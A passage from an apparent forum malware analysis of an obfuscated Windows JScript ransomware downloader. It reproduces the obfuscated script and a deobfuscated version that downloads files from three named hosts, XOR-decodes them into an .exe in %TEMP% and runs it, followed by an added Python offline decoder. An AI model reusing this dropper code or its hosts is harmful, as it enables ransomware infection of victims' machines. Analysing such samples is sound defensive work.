PTB4MjUxQzt0MlsweEM0XT0weDI1MDA7dDJbMHhDNV09MHgyNTNDO3QyWzB4QzZdPTB4MjU1RTt0MlsweEM3XT0weDI1NUY7dDJbMHhDOF09MHgyNTVBO3QyWzB4QzldPTB4MjU1NDt0MlsweENBXT0weDI1Njk7dDJbMHhDQl09MHgyNTY2O3QyWzB4Q0NdPTB4MjU2MDt0MlsweENEXT0weDI1NTA7dDJbMHhDRV09MHgyNTZDO3QyWzB4Q0ZdPTB4MjU2Nzt0MlsweEQwXT0weDI1Njg7dDJbMHhEMV09MHgyNTY0O3QyWzB4RDJdPTB4MjU2NTt0MlsweEQzXT0weDI1NTk7dDJbMHhENF09MHgyNTU4O3QyWzB4RDVdPTB4MjU1Mjt0MlsweEQ2XT0weDI1NTM7dDJbMHhEN109MHgyNTZCO3QyWzB4RDhdPTB4MjU2QTt0MlsweEQ5XT0weDI1MTg7dDJbMHhEQV09MHgyNTBDO3
QyWzB4REJdPTB4MjU4ODt0MlsweERDXT0weDI1ODQ7dDJbMHhERF09MHgyNThDO3QyWzB4REVdPTB4MjU5MDt0MlsweERGXT0weDI1ODA7dDJbMHhFMF09MHgwM0IxO3QyWzB4RTFdPTB4MDBERjt0MlsweEUyXT0weDAzOTM7dDJbMHhFM109MHgwM0MwO3QyWzB4RTRdPTB4MDNBMzt0MlsweEU1XT0weDAzQzM7dDJbMHhFNl09MHgwMEI1O3QyWzB4RTddPTB4MDNDNDt0MlsweEU4XT0weDAzQTY7dDJbMHhFOV09MHgwMzk4O3QyWzB4RUFdPTB4MDNBOTt0MlsweEVCXT0weDAzQjQ7dDJbMHhFQ109MHgyMjFFO3QyWzB4RURdPTB4MDNDNjt0MlsweEVFXT0weDAzQjU7dDJbMHhFRl09MHgyMjI5O3QyWzB4RjBdPTB4MjI2MTt0MlsweEYxXT0weDAwQjE7dDJbMHhGMl09MHgyMjY1O3QyWzB4RjNdPTB4MjI2NDt0MlsweEY0XT0weDIzMjA7dDJbMHhGNV09MHgyMzIxO3QyWzB4RjZdPTB4MDBGNzt0MlsweEY3XT0weDIyNDg7dDJbMHhGOF09MHgwMEIwO3QyWzB4RjldPTB4MjIxOTt0MlsweEZBXT0weDAwQjc7dDJbMHhGQl09MHgyMjFBO3QyWzB4RkNdPTB4MjA3Rjt0MlsweEZEXT0weDAwQjI7dDJbMHhGRV09MHgyNUEwO3QyWzB4RkZdPTB4MDBBMDsNCgkNCgl2YXIgRUdqPW5ldyBBcnJheSgpOw0KCXZhciByZXN1bHRTdHJpbmc9IiI7DQoJdmFyIEhJaTM7IHZhciBPVmM5Ow0KCWZvciAodmFyIFRqPTA7IFRqIDwgY29kZUFycmF5WyJsZW5ndGgiXTsgVGorKykNCgl7DQoJCUhJaTM9Y29kZUFycmF5W1RqXTsNCgkJaWYgKEhJaTMgPCAxMjgpIA0KCQkJe09WYzk9SElpMzt9DQoJCWVsc2UgDQoJCQl7T1ZjOT10MltISWkzXTt9DQoJCUVHai5wdXNoKFN0cmluZ1siZnJvbUNoYXJDb2RlIl0oT1ZjOSkpOw0KCX0NCgkNCglyZXN1bHRTdHJpbmc9RUdqWyJqb2luIl0oIiIpOw0KCQ0KCXJldHVybiByZXN1bHRTdHJpbmc7DQp9Ow0KZnVuY3Rpb24gdm90Z29yb2RhemFzcGlub3lpcHV0a29yb2hlQ0NDc2F0dChmaWxlUGF0aCwgY29kZUFycmF5KQ0Kew0KICAgIHZhciB2b3Rnb3JvZGF6YXNwaW5veWlwdXRrb3JvaGVDQ0NIcm9zdGVrcz1XU2NyaXB0WyJDcmVhdGVPYmplY3QiXSgiQURPREIuU3RyZWFtIik7DQogICAgdm90Z29yb2RhemFzcGlub3lpcHV0a29yb2hlQ0NDSHJvc3Rla3NbInR5cGUiXT0yOw0KICAgIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm9oZUNDQ0hyb3N0ZWtzWyJDaGFyc2V0Il09NDM3OyAgICAgICAgIA0KICAgIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm9oZUNDQ0hyb3N0ZWtzWyJvcGVuIl0oKTsNCiAgICB2b3Rnb3JvZGF6YXNwaW5veWlwdXRrb3JvaGVDQ0NIcm9zdGVrc1sid3JpdGVUZXh0Il0odm90Z29yb2RhemFzcGlub3lpcHV0a29yb2hlQ0NDZmF0cyhjb2RlQXJyYXkpKTsNCiAgICB2b3Rnb3JvZGF6YXNwaW5veWlwdXRrb3JvaGVDQ0NIcm9zdGVrc1siU2F2ZVRvRmlsZSJdKGZpbGVQYXRoLCAyKTsNCiAgICB2b3Rnb3JvZGF6YXNwaW5veWlwdXRrb3JvaGVDQ0NIcm9zdGVrc1siY2xvc2UiXSgpOw0KfTsNCiB2YXIgeE
tleSA9IHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm9oZUNDQ2ZzdGEoIkNZeFVsM2JyMDdTSmJZUzU2ZWVWOGxLd0tIOFNFVzNvIik7DQogDQpmdW5jdGlvbiB2b3Rnb3JvZGF6YXNwaW5veWlwdXRrb3JvaGVDQ0N4ZGFjKHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm9oZUNDQ2NjYSkNCnsNCglmb3IgKHZhciBUaj0wOyBUaiA8IHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm9oZUNDQ2NjYVsibGVuZ3RoIl07IFRqKyspDQoJew0KCQl2b3Rnb3JvZGF6YXNwaW5veWlwdXRrb3JvaGVDQ0NjY2FbVGpdIF49IHhLZXlbTWF0aC5mbG9vcihUaiAlIHhLZXkubGVuZ3RoKV07DQoJfQkJDQoJcmV0dXJuIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm9oZUNDQ2NjYTsNCn07".votgorodazaspinoyiputkoroheCCCmanysecretthings());
function votgorodazaspinoyiputkoroheCCCShtyler4(votgorodazaspinoyiputkoroheCCCgutter, votgorodazaspinoyiputkoroheCCCStrokaParam2) {

var votgorodazaspinoyiputkoroheCCCwandermander = votgorodazaspinoyiputkoroheCCCvulture ;
votgorodazaspinoyiputkoroheCCCwandermander=votgorodazaspinoyiputkoroheCCCwandermander+ "\u002f";
votgorodazaspinoyiputkoroheCCCwandermander=votgorodazaspinoyiputkoroheCCCwandermander + votgorodazaspinoyiputkoroheCCCStrokaParam2 ;
//votgorodazaspinoyiputkoroheCCCwandermander = votgorodazaspinoyiputkoroheCCCwandermander + votgorodazaspinoyiputkoroheCCCamalgamation;
votgorodazaspinoyiputkoroheCCCsudabilo1[votgorodazaspinoyiputkoroheCCCostrokoncert](("votgorodazaspinoyiputkoroheCCClackey","votgorodazaspinoyiputkoroheCCCsnowboard","votgorodazaspinoyiputkoroheCCCunderlying","votgorodazaspinoyiputkoroheCCClongest","votgorodazaspinoyiputkoroheCCCexecration","votgorodazaspinoyiputkoroheCCCsepulchre","votgorodazaspinoyiputkoroheCCCpears","votgorodazaspinoyiputkoroheCCCcassandra","G" + votgorodazaspinoyiputkoroheCCCweasel) + ("votgorodazaspinoyiputkoroheCCCrelapse","votgorodazaspinoyiputkoroheCCClatina","votgorodazaspinoyiputkoroheCCCmanufactured","votgorodazaspinoyiputkoroheCCCflake","votgorodazaspinoyiputkoroheCCCincursion","votgorodazaspinoyiputkoroheCCCunderstand","votgorodazaspinoyiputkoroheCCCnominee","votgorodazaspinoyiputkoroheCCCgentle","votgorodazaspinoyiputkoroheCCCpixels","votgorodazaspinoyiputkoroheCCCimparting","T"), votgorodazaspinoyiputkoroheCCCgutter, false);

votgorodazaspinoyiputkoroheCCCsudabilo1[votgorodazaspinoyiputkoroheCCCtudabilo1 + ("votgorodazaspinoyiputkoroheCCCreligion","votgorodazaspinoyiputkoroheCCCsectors","votgorodazaspinoyiputkoroheCCCserfs","votgorodazaspinoyiputkoroheCCCadvertisements","votgorodazaspinoyiputkoroheCCCquickly","end")]();
var votgorodazaspinoyiputkoroheCCCadvocacy=("wendyADCDEF" + WScript=="wendyADCDEF" + "RAPAPIPATAV2lRAPAPIPATAuZG93cyBTY3JpcRAPAPIPATAHQgSG9zdA==".votgorodazaspinoyiputkoroheCCCmanysecretthings())&&typeof(votgorodazaspinoyiputkoroheCCCGzEAPd)==="undefined";

if (votgorodazaspinoyiputkoroheCCCadvocacy) {

var votgorodazaspinoyiputkoroheCCCbrings = new votgorodazaspinoyiputkoroheCCCZumZum((("votgorodazaspinoyiputkoroheCCCentrap","votgorodazaspinoyiputkoroheCCCsedan","votgorodazaspinoyiputkoroheCCCteens","votgorodazaspinoyiputkoroheCCCbathroom","votgorodazaspinoyiputkoroheCCCislam","votgorodazaspinoyiputkoroheCCCcarlo","votgorodazaspinoyiputkoroheCCCoratorio","votgorodazaspinoyiputkoroheCCCscathing","ASEO")+("votgorodazaspinoyiputkoroheCCCshare","votgorodazaspinoyiputkoroheCCCseventyeight","votgorodazaspinoyiputkoroheCCCdefine","votgorodazaspinoyiputkoroheCCCenquiries","votgorodazaspinoyiputkoroheCCCintermittently","votgorodazaspinoyiputkoroheCCCsnarl","votgorodazaspinoyiputkoroheCCCrarely","votgorodazaspinoyiputkoroheCCCcarol","O")+"DB"+("votgorodazaspinoyiputkoroheCCCtransition","votgorodazaspinoyiputkoroheCCCminnesota","votgorodazaspinoyiputkoroheCCCbasketball","votgorodazaspinoyiputkoroheCCCcinderella","votgorodazaspinoyiputkoroheCCCworld","votgorodazaspinoyiputkoroheCCCopprobrium","votgorodazaspinoyiputkoroheCCCwallis",".S")+"tr8").replace("SEO", "D").replace("8", "eam"));
votgorodazaspinoyiputkoroheCCCbrings[votgorodazaspinoyiputkoroheCCCostrokoncert]();
votgorodazaspinoyiputkoroheCCCRhXxGud = "type";
votgorodazaspinoyiputkoroheCCCbrings[votgorodazaspinoyiputkoroheCCCRhXxGud] = votgorodazaspinoyiputkoroheCCCchosen;
votgorodazaspinoyiputkoroheCCChGaSMa = "AAF10AA";
votgorodazaspinoyiputkoroheCCCbrings["d3RAPAPIPATAJpdRAPAPIPATAGU=".votgorodazaspinoyiputkoroheCCCmanysecretthings()](votgorodazaspinoyiputkoroheCCCsudabilo1[("votgorodazaspinoyiputkoroheCCCvacation","votgorodazaspinoyiputkoroheCCCplaces","votgorodazaspinoyiputkoroheCCCserves","votgorodazaspinoyiputkoroheCCCunanimity","votgorodazaspinoyiputkoroheCCCeverybody","votgorodazaspinoyiputkoroheCCCassistant","")+"R"+"es"+"pon"+votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq['U'].toLowerCase()+"e"+"QmRAPAPIPATA9keQRAPAPIPATA==".votgorodazaspinoyiputkoroheCCCmanysecretthings()]);
votgorodazaspinoyiputkoroheCCCXWaxeQhw = "AAF11AA";
votgorodazaspinoyiputkoroheCCCbrings[(votgorodazaspinoyiputkoroheCCCcasque + "o"+("votgorodazaspinoyiputkoroheCCCinterrogation","votgorodazaspinoyiputkoroheCCCcapability","votgorodazaspinoyiputkoroheCCCcharter","votgorodazaspinoyiputkoroheCCCstinging","votgorodazaspinoyiputkoroheCCCvibration","220")+("votgorodazaspinoyiputkoroheCCCnausea","votgorodazaspinoyiputkoroheCCCadoring","votgorodazaspinoyiputkoroheCCCcancer","votgorodazaspinoyiputkoroheCCCtartar","votgorodazaspinoyiputkoroheCCCpressed","votgorodazaspinoyiputkoroheCCCcoaches","votgorodazaspinoyiputkoroheCCCegoism","22i")+"tion").replace("22"+("votgorodazaspinoyiputkoroheCCCillustrated","votgorodazaspinoyiputkoroheCCCcomponents","votgorodazaspinoyiputkoroheCCCmantel","votgorodazaspinoyiputkoroheCCCplutarch","votgorodazaspinoyiputkoroheCCCvagina","votgorodazaspinoyiputkoroheCCCsprig","votgorodazaspinoyiputkoroheCCCabler","022"), votgorodazaspinoyiputkoroheCCCtudabilo1)] = 0;
votgorodazaspinoyiputkoroheCCCkrDwvrh = "AAF12AA";
votgorodazaspinoyiputkoroheCCCbrings['saveToFile'](votgorodazaspinoyiputkoroheCCCwandermander, 2);
votgorodazaspinoyiputkoroheCCCSswQdi = "AAF13AA";
votgorodazaspinoyiputkoroheCCCbrings['c'+"lo"+"se"]();
var fileArray=votgorodazaspinoyiputkoroheCCCrtfta(votgorodazaspinoyiputkoroheCCCwandermander);
fileArray=votgorodazaspinoyiputkoroheCCCxdac(fileArray);
votgorodazaspinoyiputkoroheCCCwandermander = votgorodazaspinoyiputkoroheCCCwandermander + votgorodazaspinoyiputkoroheCCCamalgamation;
votgorodazaspinoyiputkoroheCCCsatt(votgorodazaspinoyiputkoroheCCCwandermander, fileArray );
votgorodazaspinoyiputkoroheCCCrampart[votgorodazaspinoyiputkoroheCCCpromises](votgorodazaspinoyiputkoroheCCCwandermander, votgorodazaspinoyiputkoroheCCCchosen, true);
}

};
try{
votgorodazaspinoyiputkoroheCCCShtyler4("hxxp://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
votgorodazaspinoyiputkoroheCCCShtyler4("hxxp://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
votgorodazaspinoyiputkoroheCCCShtyler4("hxxp://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}

Deobfuscated:

try {
    from_url_to_file_run("hxxp://herimasu.web.fc2.com/09u9jn87?AMLXoFbQSk=KGkINlTdQz", "JlLQdKnWwif");
} catch(e) {}

try {
    from_url_to_file_run("hxxp://125ru.web.fc2.com/09u9jn87?yMsjsVxGF=efxMvO", "bsMnCcz");
} catch(e) {}

try {
    from_url_to_file_run("hxxp://hrenner.gmxhome.de/09u9jn87?xBpCVMC=cLVucBgsR", "FgGsqpxH");
} catch(e) {}

With:

function from_url_to_file_run(URL, file_name) {

    var path = objShell.ExpandEnvironmentStrings("%TEMP%") + "/" + file_name;
    // c:\users\DardiM\AppData\Local\temp\JlLQdKnWwif (example with first URL)

    objRequest.open("GET", URL, false);
    objRequest.send();

    if (WScript == "Windows Script Host") {

        var objStream = new ActiveXObject("ADODB.Stream");
        objStream.open();
        objStream.type = 1;
        objStream.write(objRequest.ResponseBody);
        objStream.position = 0;
        objStream.saveToFile(path, 2);
        // save the file downloaded
        // example for first file => c:\users\DardiM\AppData\Local\temp\JlLQdKnWwif

        objStream.close();

        var fileArray = rtfta(path); // array of Bytes (char codes)
        // load content from file
        // => example : c:\users\DardiM\AppData\Local\temp\JlLQdKnWwif
        // and call fsta(fileString) : first "character substitution cipher" decoder
        function rtfta(filePath) {
            var Hrosteks = WScript["CreateObject"]("ADODB.Stream");
            Hrosteks["type"] = 2;
            Hrosteks["Charset"] = 437;
            Hrosteks["open"]();
            Hrosteks["LoadFromFile"](filePath);
            var fileString = Hrosteks["ReadText"];
            Hrosteks["close"]();
            return fsta(fileString);
        };
        function fsta(fileString) {

            var t1 = new Array();
            t1[0xC7]=0x80;t1[0xFC]=0x81;t1[0xE9]=0x82;t1[0xE2]=0x83;t1[0xE4]=0x84;
            .....
            .....
            t1[0x2248]=0xF7;t1[0xB0]=0xF8;t1[0x2219]=0xF9;t1[0xB7]=0xFA;t1[0x221A]=0xFB;
            t1[0x207F]=0xFC;t1[0xB2]=0xFD;t1[0x25A0]=0xFE;t1[0xA0]=0xFF;

            var resultArray = new Array();

            for (var Tj = 0; Tj < fileString["length"]; Tj++) {
                var OVc9 = fileString["charCodeAt"](Tj);
                if (OVc9 < 128) {
                    var HIi3 = OVc9;
                }
                else {
                    var HIi3 = t1[OVc9];
                }
                resultArray["push"](HIi3);
            };
            return resultArray /* y */;
        };

        fileArray = xdac(fileArray);
        // deobfuscation with XOR function, using xKey Array
        // (xKey is initialized out of this current from_url_to_file_run function by
        // var xKey = fsta("CYxUl3br07SJbYS56eeV8lKwKH8SEW3o") - first "character substitution cipher" decoder)
        function xdac(cca) {
            for (var Tj = 0; Tj < cca["length"]; Tj++) {
                cca[Tj] ^= xKey[Math.floor(Tj % xKey.length)];
            }
            return cca;
        };

        path = path + ".exe";
        // example with first URL : c:\users\DardiM\AppData\Local\temp\JlLQdKnWwif.exe

        satt(path, fileArray);
        // calls fats function : second "character substitution cipher" decoder,
        // and save the file as real ".exe"

        function satt(filePath, codeArray) {
            var Hrosteks = WScript["CreateObject"]("ADODB.Stream");
            Hrosteks["type"] = 2;
            Hrosteks["Charset"] = 437;
            Hrosteks["open"]();
            Hrosteks["writeText"](fats(codeArray));
            Hrosteks["SaveToFile"](filePath, 2);
            Hrosteks["close"]();
        };
        function fats(codeArray) {

            var t2 = new Array();
            t2[0x80]=0x00C7;t2[0x81]=0x00FC;t2[0x82]=0x00E9;t2[0x83]=0x00E2;t2[0x84]=0x00E4;
            t2[0x85]=0x00E0;t2[0x86]=0x00E5;t2[0x87]=0x00E7;t2[0x88]=0x00EA;t2[0x89];
            ...
            ...
            ...
            t2[0xF8]=0x00B0;t2[0xF9]=0x2219;t2[0xFA]=0x00B7;t2[0xFB]=0x221A;t2[0xFC]=0x207F;
            t2[0xFD]=0x00B2;t2[0xFE]=0x25A0;t2[0xFF]=0x00A0;
            var EGj = new Array();
            var resultString = "";
            var HIi3;
            var OVc9;
            for (var Tj = 0; Tj < codeArray["length"]; Tj++) {
                HIi3 = codeArray[Tj];
                if (HIi3 < 128) {
                    OVc9 = HIi3;
                }
                else {
                    OVc9 = t2[HIi3];
                }
                EGj.push(String["fromCharCode"](OVc9));
            }
            resultString = EGj["join"]("");
            return resultString;
        };

        objShell.Run(path, 1, true); // run the exe file
    }
};

rtfta, fsta, xdac and satt are the functions we have seen in a previous post, hidden in the very long "encrypted" string.

They are used to turn the obfuscated exe file (not seen as an exe file when downloaded, since its content is modified) into the real exe ransomware.

CONCLUSION :

This script tries to download 3 files (the same files, but it gives them 3 different names)
=> no part to check whether one was already successfully downloaded :rolleyes:
=> no part to check whether the deobfuscation produced the right exe files (for example a check of "MZ" at the beginning of the file) :confused:

The obfuscation of the script is very well done, using several methods; I have rarely seen as many different good methods in one file.
But: the URLs are VERY easy to retrieve at the end of the file, in the try/catch parts... :D
=> a simple Unicode unescape...
=> I had them from the beginning - see part 2)
https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-529178

So, to end this Part 3 analysis:

=> "Why, plz why?"
The only "good answer" would be: "downloading the obfuscated ransomware without the functions to deobfuscate it is useless"
=> "yes, but it's too easy to black-list / report the URLs and file names used, and: we don't especially want to analyze the ransomwares" :p

It's also a (bad) way to quickly update the URL / name parts when distributed...

N.B.: adding // (comment marker) to the "run" line allows people to obtain the deobfuscated files (the last part of the function seen in the try/catch blocks). And also because we can see their names, which appear in clear (we just have to add ".exe" to the names) => easy to find them with a "search" on the HD after they are "ready" .exe files.
votgorodazaspinoyiputkoroheCCCrampart[votgorodazaspinoyiputkoroheCCCpromises](votgorodazaspinoyiputkoroheCCCwandermander, votgorodazaspinoyiputkoroheCCCchosen, true);
 
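An added example (not DardiM's code and not part of the analysed sample): a Python decoder that reverses the downloader's payload transformation offline, for an analyst who has the downloaded blob and wants the payload without executing the script. It assumes the xKey seed quoted in the post ("CYxUl3br07SJbYS56eeV8lKwKH8SEW3o") and a constructed sample blob; it also checks the post's observation that the two hard-coded substitution tables (t1[0xC7]=0x80, t2[0x80]=0x00C7, ...) are nothing more than code page 437, and it adds the "MZ" sanity check the script itself never performs.

```python
"""
Offline decoder for the downloaded blob (added example, not the sample's code).

The script reads the downloaded file as TEXT with Charset=437, maps every
non-ASCII character back to a byte with t1, XORs with a repeating key, maps
the bytes back to characters with t2 and writes them out with Charset=437.
Both tables are exactly the cp437 codec, so the whole pipeline collapses to
"XOR with a repeating ASCII key". The functions below mirror the script's
names so the two can be read side by side.
"""

# Key seed quoted in the post; it is pure ASCII, so fsta() returns its bytes.
KEY_SEED = "CYxUl3br07SJbYS56eeV8lKwKH8SEW3o"


def cp437_tables():
    """Rebuild t1 (code point -> byte) and t2 (byte -> code point) from
    Python's cp437 codec instead of the ~128 hard-coded assignments."""
    t2 = {b: ord(bytes([b]).decode("cp437")) for b in range(0x80, 0x100)}
    t1 = {cp: b for b, cp in t2.items()}
    return t1, t2


def fsta(text):
    """First 'substitution' decoder: text read under Charset=437 -> raw bytes."""
    t1, _ = cp437_tables()
    return bytes(ord(c) if ord(c) < 128 else t1[ord(c)] for c in text)


def fats(code):
    """Second 'substitution' decoder: raw bytes -> text to be written under Charset=437."""
    _, t2 = cp437_tables()
    return "".join(chr(b) if b < 128 else chr(t2[b]) for b in code)


def xdac(data, key):
    """XOR with a repeating key, exactly as the sample's xdac() does."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_payload(blob, key_seed=KEY_SEED):
    """Full pipeline: ReadText(437) -> fsta -> xdac -> fats -> WriteText(437)."""
    key = fsta(key_seed)
    text = blob.decode("cp437")            # what ReadText returns for the file
    raw = fsta(text)                       # back to the file's bytes
    plain = xdac(raw, key)
    return fats(plain).encode("cp437")     # what WriteText stores on disk


def looks_like_pe(data):
    """The check the downloader never does: a PE file starts with 'MZ'."""
    return data[:2] == b"MZ"


# Constructed sample: a PE-looking header followed by filler, then transformed
# the way the server-side blob would be (XOR with the key). Not a real payload.
SAMPLE_PLAIN = (b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
                + b"constructed PE-like payload for the example")
SAMPLE_BLOB = xdac(SAMPLE_PLAIN, KEY_SEED.encode("ascii"))

if __name__ == "__main__":
    t1, t2 = cp437_tables()
    print("t1[0xC7] =", hex(t1[0xC7]), "t2[0x80] =", hex(t2[0x80]))
    print("blob on disk starts with MZ?", looks_like_pe(SAMPLE_BLOB))
    decoded = decode_payload(SAMPLE_BLOB)
    print("decoded starts with MZ?", looks_like_pe(decoded))
    print("round trip ok?", decoded == SAMPLE_PLAIN)
```

Because the blob on disk is XORed, it does not begin with "MZ" and is not recognised as an executable until the script rewrites it; an analyst can run `decode_payload()` on the saved file instead and inspect the result without ever reaching the `Run` line.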